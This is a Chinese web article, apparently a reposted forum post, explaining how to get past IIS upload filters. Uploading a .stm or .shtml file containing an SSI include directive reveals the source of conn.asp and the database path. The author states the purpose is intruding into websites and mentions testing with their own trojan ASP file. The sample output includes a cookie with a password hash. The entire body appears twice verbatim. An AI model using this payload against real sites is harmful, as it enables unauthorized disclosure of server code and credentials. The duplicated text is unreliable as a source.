当网站不允许上传asp cer cdx htr文件时的一个解决方法!
程序员文章站
2022-03-12 22:11:40
前些天向lcx大哥求教关于web上传的问题,说起利用stm来上传,还能执行程序,不解,就给我了一段代码: 见lcx大哥给的一段代码 说保存为stm或...
前些天向lcx大哥求教关于web上传的问题,说起利用stm来上传,还能执行程序,不解,就给我了一段代码:
见lcx大哥给的一段代码
说保存为stm或者shtml看看,运行如下:
http_accept:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* http_accept_language:zh-cn http_connection:keep-alive http_host:localhost http_user_agent:mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; maxthon; .net clr 1.1.4322) http_cookie:nbblastactivity=1100263629; bblastvisit=1100264583; bblastactivity=1100265530; bbuserid=1; bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; aspsessionidaqtsdrqq=jogdcebdcnkfmlgdnfhpdhmj http_accept_encoding:gzip, deflate
当前文件名称:f:\web\1.stm
web服务器的名称和版本:microsoft-iis/5.0
主机名:localhost
端口:80
客户或客户代理ip地址:127.0.0.1
客户或客户代理主机名:127.0.0.1
path_info 的值,但带有扩展为某个目录规范的虚拟路径:f:\web\1.stm
客户端给出附加路径信息:/1.stm
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
一直不解!
今天在幻影旅团看到了一段话
引用
当网站不允许上传asp cer cdx htr等文件时, 上传一个stm文件, 内容为:
<!--#include file="conn.asp"-->
直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦!
并且又看了那篇shtml的介绍后,恍然大悟,终于明白了!
原来就是如上所说的,
[color=green]<!--#include file="conn.asp"-->
就是一条ssi指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它html文档一样显示info.htm其中的内容。[/color]
我在本地试验成功!在我的iis目录下建了一个test.stm文件,内容为:
<!--#include file="ok.asp"-->
又在同一目录下放了一个我的一个木马文件ok.asp
在浏览器中请求test.stm,没有什么反映,一片空白。
但是一查看源代码,狂晕,原来就是我的asp文件的内容!
这样我们就可以利用这个来获取要入侵的web的conn文件来获得数据库路径,
但是一个前提是服务器的对stm或者shtml的扩展没有删除!
再次感谢lcx大哥的指导!
见lcx大哥给的一段代码
说保存为stm或者shtml看看,运行如下:
http_accept:image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */* http_accept_language:zh-cn http_connection:keep-alive http_host:localhost http_user_agent:mozilla/4.0 (compatible; msie 6.0; windows nt 5.0; maxthon; .net clr 1.1.4322) http_cookie:nbblastactivity=1100263629; bblastvisit=1100264583; bblastactivity=1100265530; bbuserid=1; bbpassword=0f8514d1ed2eaa91fb9a87a568f6c96f; aspsessionidaqtsdrqq=jogdcebdcnkfmlgdnfhpdhmj http_accept_encoding:gzip, deflate
当前文件名称:f:\web\1.stm
web服务器的名称和版本:microsoft-iis/5.0
主机名:localhost
端口:80
客户或客户代理ip地址:127.0.0.1
客户或客户代理主机名:127.0.0.1
path_info 的值,但带有扩展为某个目录规范的虚拟路径:f:\web\1.stm
客户端给出附加路径信息:/1.stm
image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
一直不解!
今天在幻影旅团看到了一段话
引用
当网站不允许上传asp cer cdx htr等文件时, 上传一个stm文件, 内容为:
<!--#include file="conn.asp"-->
直接请求这个stm文件, conn.asp就一览无遗, 数据库路径也就到手啦!
并且又看了那篇shtml的介绍后,恍然大悟,终于明白了!
原来就是如上所说的,
[color=green]<!--#include file="conn.asp"-->
就是一条ssi指令,其作用是将"info.htm"的内容拷贝到当前的页面中,当访问者来浏览时,会看到其它html文档一样显示info.htm其中的内容。[/color]
我在本地试验成功!在我的iis目录下建了一个test.stm文件,内容为:
<!--#include file="ok.asp"-->
又在同一目录下放了一个我的一个木马文件ok.asp
在浏览器中请求test.stm,没有什么反映,一片空白。
但是一查看源代码,狂晕,原来就是我的asp文件的内容!
这样我们就可以利用这个来获取要入侵的web的conn文件来获得数据库路径,
但是一个前提是服务器的对stm或者shtml的扩展没有删除!
再次感谢lcx大哥的指导!
上一篇: PHPSHELL又出新东东啦!